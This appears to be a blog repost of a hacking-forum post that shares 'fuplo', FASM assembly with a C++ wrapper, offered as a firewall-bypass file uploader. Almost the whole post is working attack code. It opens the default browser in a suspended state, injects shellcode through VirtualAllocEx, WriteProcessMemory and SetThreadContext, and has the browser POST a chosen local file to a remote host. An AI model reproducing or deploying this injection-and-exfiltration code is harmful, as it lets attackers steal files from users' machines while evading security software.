[fasm/c/c++] Fuplo - File Uploading And Simple Firewall Bypass

http://www.rohitab.com/discuss/topic/31151-fasmcc-fuplo-file-uploading-and-simple-firewall-bypass/

Hello.

I wrote this for my friend who reads this forum. The code isn't very clear (not commented, because I wrote it very fast (in one night (~10h))) :D The only exception is utils.inc, which I ripped from my other project. Anyway I decided to show off this code, because you probably find it useful ;) The actual code is written in FASM and it compiles to .obj-file. Object file is very similar to .DLL, but it's in linkable format so you can use it with HLLs. The source code and simple example how to use it in C++ is below (compiled .obj and Dev-C++ project file in attachment).

Method I use for firewall bypass is pretty simple and effective (not the scriptkiddish registry modification trick...) fuplo(char* szUrl, char* szFile) function in fuplo.obj first resolves default browser from registry (HKEY_CLASSES_ROOT\HTTP\shell\open\command) and uses CreateProcess with CREATE_SUSPENDED-flag to open the browser. Then, by using VirtualAllocEx and WriteProcessMemory it writes code that is used to uploading to address space of the browser. Browser executes the code and uploads the specified file -> horray!

So the method relies on that firewall has given required privileges to browser to "access internet" :D I still want to say that this method is not however completely stealth, because firewall software can hook function calls to CreateProcess and WriteProcessMemory and notify user of suspicious behavior.

fuplo.ASM (im sorry about ugly indent - i used bad IDE :()


format MS COFF;PE GUI 4.0

include 'win32a.inc'
include 'api/wsock32.inc'
include 'defs.inc'

public fuplo as '_fuplo'

section '.text' code readable executable

..inject:
   call @f
@@:

;   pushz 'kernel32.dll'
;   call LocateModule;
;   pushz 'Sleep'
;   push eax
;   call GetProc
;   mov ebx, eax
;@@:   push 1000
;   call ebx
;   jmp @b
   pushz 'kernel32.dll'
   call LocateModule
   mov ebx, eax      ; base of kernel in ebx

   pop eax
   add eax, ..endofinject-..inject-5
   push eax
   mov edi, eax
   mov al, 0
   or ecx, -1
   repnz scasb
   push edi
   call upload

   pushz 'ExitProcess'
   push ebx
   call GetProc
   push 0
   call eax

proc upload szFile:DWORD, szUrl:DWORD
   local hKernel32:DWORD
   local hUser32:DWORD
   local szHost:DWORD
   local szPath:DWORD
   local dwFileNameLen:DWORD
   local szShortName:DWORD
   local dwRequestLen:DWORD
   local lpRequest:DWORD
   local hFile:DWORD
   local dwRead:DWORD
   local dwFileSize:DWORD
   local szRequest:DWORD
   local lpLocalAlloc:DWORD
   local wsa:WSADATA
   local dest:sockaddr_in
   local fdSock:DWORD
   xor eax, eax
   pushad

   pushz 'user32.dll'
   pushz 'LoadLibraryA'
   push ebx
   call GetProc
   mov esi, eax
   call eax
   mov [hUser32], eax

   pushz 'WS2_32.dll'
   call esi
   test eax, eax
   je .Exit

   mov [hKernel32], ebx
   mov ebx, eax

   lea eax, [wsa]
   push eax
   push 101h
   pushz 'WSAStartup'
   push ebx
   call GetProc
   call eax
   test eax, eax
   jnz .Exit

     ; parsaa
   mov [dwRequestLen], 0
   mov edi, [szUrl]
   cmp dword [edi], 'http'
   jnz .wwwcheck
   add edi, 7; http://
.wwwcheck:  cmp dword [edi], 'www.'
   jnz @f
   add edi, 4
@@:   mov esi, edi
   mov al, '/'
   mov ecx, 60
   repnz scasb
   jnz .Exit2; invalid url
   sub edi, esi
   add [dwRequestLen], edi
   dec [dwRequestLen]
   push edi
   push edi
   push LMEM_FIXED
   pushz 'LocalAlloc'
   push [hKernel32]
   call GetProc
   mov [lpLocalAlloc], eax
   call eax

   pop ecx
   mov edi, eax
   mov [szHost], eax
   push eax
   rep movsb
   mov byte [edi-1], 0

   dec esi
   mov edi, esi
   mov al, 0
   mov ecx, 0FFh
   repnz scasb
   jnz .Exit2
   sub edi, esi
   add [dwRequestLen], edi
   dec [dwRequestLen]
   push edi
   push edi
   push LMEM_FIXED
   call [lpLocalAlloc]

   pop ecx
   mov edi, eax
   mov [szPath], eax
   rep movsb

   pushz 'gethostbyname'
   push ebx
   call GetProc
   call eax
   test eax, eax
   je .Exit2

   mov eax, [eax+hostent.h_addr_list]
   mov eax, [eax]
   mov eax, [eax]
   mov [dest+sockaddr_in.sin_addr], eax

   add [dwRequestLen], .FormatEnd-.FormatStart-6
   add [dwRequestLen], 3; PANIXPANIC PANIC P�Y ATTENTI�N T� TIZ

   push NULL
   push FILE_ATTRIBUTE_NORMAL
   push OPEN_EXISTING
   push NULL
   push FILE_SHARE_READ
   push GENERIC_READ
   push [szFile]
   pushz 'CreateFileA'
   push [hKernel32]
   call GetProc
   call eax
   test eax, eax
   je .Exit
   mov [hFile], eax

   push NULL
   push eax
   pushz 'GetFileSize'
   push [hKernel32]
   call GetProc
   call eax
   mov [dwFileSize], eax
   add [dwRequestLen], eax

   mov edi, [szFile]
   xor al, al
   or ecx, -1
   repnz scasb
   lea esi, [edi-2]
   std
@@:   lodsb
   cmp esi, [szFile]
   je .ShortFN
   cmp al, '\'
   jnz @b
@@:   inc esi
   inc esi
.ShortFN:   cld
   mov [szShortName], esi
   sub edi, esi
   dec edi
   mov [dwFileNameLen], edi

   push PAGE_READWRITE
   push MEM_COMMIT
   push [dwRequestLen]
   push NULL
   pushz 'VirtualAlloc'
   push [hKernel32]
   call GetProc
   call eax
   mov [lpRequest], eax

   push [szShortName]
   push [dwFileSize]
   add dword [esp], .FormatEnd-.ContentStart-3; null-terminator + %s
   mov eax, [dwFileNameLen]
   add [esp], eax
   push [szHost]
   push [szPath]
   call .FormatEnd
.FormatStart:  db "POST %s HTTP/1.1",0Dh,0Ah
   db "Host: %s",0Dh,0Ah
   db "User-Agent: fuplo",0Dh,0Ah
   db 'Content-Type: multipart/form-data; boundary="=_vw0.98992842109405d_="',0Dh,0Ah
   db "Content-Length: %ld",0Dh,0Ah,0Dh,0Ah

.ContentStart  db "--=_vw0.98992842109405d_=",0Dh,0Ah
   db 'Content-Disposition: form-data; name="upf"; filename="%s"',0Dh,0Ah,0Dh,0Ah,0

.EndBoundary:  db 0Dh,0Ah,"--=_vw0.98992842109405d_=--",0Dh,0Ah
.FormatEnd: push [lpRequest]
   pushz 'wsprintfA'
   push [hUser32]
   call GetProc
   call eax
   add esp, 4 * 6

   mov edi, [lpRequest]
   add edi, eax
   add eax, .FormatEnd-.EndBoundary
   mov [dwRequestLen], eax

   push [szHost]
   pushz 'LocalFree'
   push [hKernel32]
   call GetProc
   mov esi, eax
   call eax
   push [szPath]
   call esi

   push NULL
   lea eax, [dwRead]
   push eax
   push [dwFileSize]
   push edi
   push [hFile]
   pushz 'ReadFile'
   push [hKernel32]
   call GetProc
   call eax
   mov esi, eax

   push [hFile]
   pushz 'CloseHandle'
   push [hKernel32]
   call GetProc
   call eax

   test esi, esi
   je .Exit3

   mov eax, [dwRead]
   add [dwRequestLen], eax
   add edi, [dwFileSize]
   call @f
@@:   pop esi
   add esi, .EndBoundary - @b
   mov ecx, .FormatEnd-.EndBoundary
   rep movsb

   push 0
   push SOCK_STREAM
   push PF_INET
   pushz 'socket'
   push ebx
   call GetProc
   call eax
   cmp eax, -1
   je .Exit3
   mov [fdSock], eax

   mov [dest+sockaddr_in.sin_family], AF_INET
   mov [dest+sockaddr_in.sin_port], 5000h
   mov ecx, sizeof.sockaddr_in.sin_zero
   lea edi, [dest+sockaddr_in.sin_zero]
   xor al, al
   rep stosb

   push sizeof.sockaddr_in
   lea eax, [dest]
   push eax
   push [fdSock]
   pushz 'connect'
   push ebx
   call GetProc
   call eax
   cmp eax, -1
   je .Exit3

   pushz 'send'
   push ebx
   call GetProc
   mov esi, eax
   mov edi, [lpRequest]

   push MEM_DECOMMIT
   push [dwRequestLen]

@@:   push 0
   push [dwRequestLen]
   push edi
   push [fdSock]
   call esi
   add edi, eax
   sub [dwRequestLen], eax
   jnz @b

.Exit3:  push [lpRequest]
   pushz 'VirtualFree'
   push [hKernel32]
   call GetProc
   call eax

   push [fdSock]
   pushz 'closesocket'
   push ebx
   call GetProc
   call eax
     ;pushz 'Sleep'
     ;push [hKernel32]
     ;call GetProc
     ;push 1000
     ;call eax

.Exit2:  pushz 'WSACleanup'
   push ebx
   call GetProc
   call eax
.Exit:   popad
   ret
endp

   include 'utils.inc'
   label szGivenUrl BYTE
..endofinject:

proc fuplo szUrl:DWORD, szFile:DWORD
   xor eax, eax
   pushad
   local hKernel32:DWORD
   local hAdvapi32:DWORD
   local szBrowserPath:DWORD
   local dwUrlLen:DWORD
   local dwFilenameLen:DWORD

   mov edi, [szUrl]
   or ecx, -1
   xor al, al
   repnz scasb
   neg ecx
   sub ecx, 1;2
   mov [dwUrlLen], ecx

   mov edi, [szFile]
   or ecx, -1
   xor al, al

   repnz scasb
   neg ecx
   sub ecx, 1
   mov [dwFilenameLen], ecx

   pushz 'kernel32.dll'
   call LocateModule
   mov [hKernel32], eax

   pushz 'advapi32.dll'
   pushz 'LoadLibraryA'
   push eax
   call GetProc
   call eax
   mov [hAdvapi32], eax

_ResolveBrowser:
   local hHttpKey:DWORD
   local lpKeyData:DWORD
   local dwCrap:DWORD

   mov ebx, eax
   pushz 'RegOpenKeyExA'
   push eax
   call GetProc

   lea edx, [hHttpKey]
   push edx
   push KEY_QUERY_VALUE
   push 0
   pushz 'HTTP\shell\open\command'
   push HKEY_CLASSES_ROOT
   call eax
   test eax, eax
   jnz _Exit

   lea edx, [dwCrap]
   push edx
   push NULL
   push NULL
   push NULL
   push NULL
   push [hHttpKey]
   pushz 'RegQueryValueExA'
   push ebx
   call GetProc
   mov edi, eax
   call eax

   push [dwCrap]
   push LMEM_FIXED
   pushz 'LocalAlloc'
   push [hKernel32]
   call GetProc
   call eax
   mov [lpKeyData], eax
   mov esi, eax

   lea edx, [dwCrap]
   push edx
   push eax
   push 0
   push NULL
   push NULL
   push [hHttpKey]
   call edi

   push [hHttpKey]
   pushz 'RegCloseKey'
   push ebx
   call GetProc
   call eax

   mov ebx, [hKernel32]

_ParseKeyData:
   mov [szBrowserPath], esi
   lodsb
   cmp al, '"'
   jnz @f
   inc [szBrowserPath]
   jmp .SearchEnd
@@:   mov al, ' '
.SearchEnd: mov edi, esi
@@:   scasb
   jnz @b
   mov byte [edi-1], 0

_CreateProcess:
   local pi:PROCESS_INFORMATION
   local si:STARTUPINFO

   mov ecx, sizeof.PROCESS_INFORMATION
   lea edi, [pi]
   push edi
   xor al, al
   rep stosb
   mov ecx, sizeof.STARTUPINFO
   lea edi, [si]
   push edi
   push edi
   rep stosb

   pushz 'GetStartupInfoA'
   push ebx
   call GetProc
   call eax

   push NULL
   push NULL
   push CREATE_SUSPENDED
   push FALSE
   push NULL
   push NULL
   push NULL
   push [szBrowserPath]

   pushz 'CreateProcessA'
   push ebx
   call GetProc
   call eax
   test eax, eax
   je _Exit

.HijackProcess:
   local lpInjection:DWORD
   local ctx:CONTEXT

   push PAGE_EXECUTE_READWRITE
   push MEM_COMMIT
   mov eax, ..endofinject-..inject
   add eax, [dwUrlLen]
   add eax, [dwFilenameLen]
   push eax
   push NULL
   push dword [pi+PROCESS_INFORMATION.hProcess]
   pushz 'VirtualAllocEx'
   push ebx
   call GetProc
   call eax
   mov [lpInjection], eax

   lea edx, [ctx]
   push edx
   mov [edx+CONTEXT.ContextFlags], CONTEXT_FULL
   push dword [pi+PROCESS_INFORMATION.hThread]
   pushz 'GetThreadContext'
   push ebx
   call GetProc
   call eax

   mov edi, [lpInjection]
   lea eax, [dwCrap]
   push eax
   push ..endofinject-..inject
   push ..inject
   push edi
   push dword [pi+PROCESS_INFORMATION.hProcess]
   pushz 'WriteProcessMemory'
   push ebx
   call GetProc
   mov esi, eax
   mov [ctx+CONTEXT.Eip], edi
   call eax
   add edi, ..endofinject-..inject
   lea eax, [dwCrap]
   push eax
   push [dwUrlLen]
   push [szUrl]
   push edi
   push dword [pi+PROCESS_INFORMATION.hProcess]
   call esi
   add edi, [dwUrlLen]
   lea eax, [dwCrap]
   push eax
   push [dwFilenameLen]
   push [szFile]
   push edi
   push dword [pi+PROCESS_INFORMATION.hProcess]
   call esi

   lea edx, [ctx]
   push edx
   push dword [pi+PROCESS_INFORMATION.hThread]
   pushz 'SetThreadContext'
   push ebx
   call GetProc
   call eax

   push dword [pi+PROCESS_INFORMATION.hThread]
   pushz 'ResumeThread'
   push ebx
   call GetProc
   call eax

   mov [esp+_PUSHAD.Pushad_eax], 1
_Exit:   popad
   ret
endp

posted on 2011-03-08 22:05 挑灯看剑 阅读(353) 评论(0)  编辑 收藏 引用 所属分类: C/C++

只有注册用户登录后才能发表评论。
<2012年10月>
30123456
78910111213
14151617181920
21222324252627
28293031123
45678910

导航

公告

【自我介绍】 08年南开大学硕士毕业 最近关注:算法、Linux、c++、高并发 爱好:滑旱冰、打乒乓球、台球、保龄球

常用链接

随笔分类(139)

文章分类

我常去的网站

技术博客(都是大牛)

技术站点

搜索

积分与排名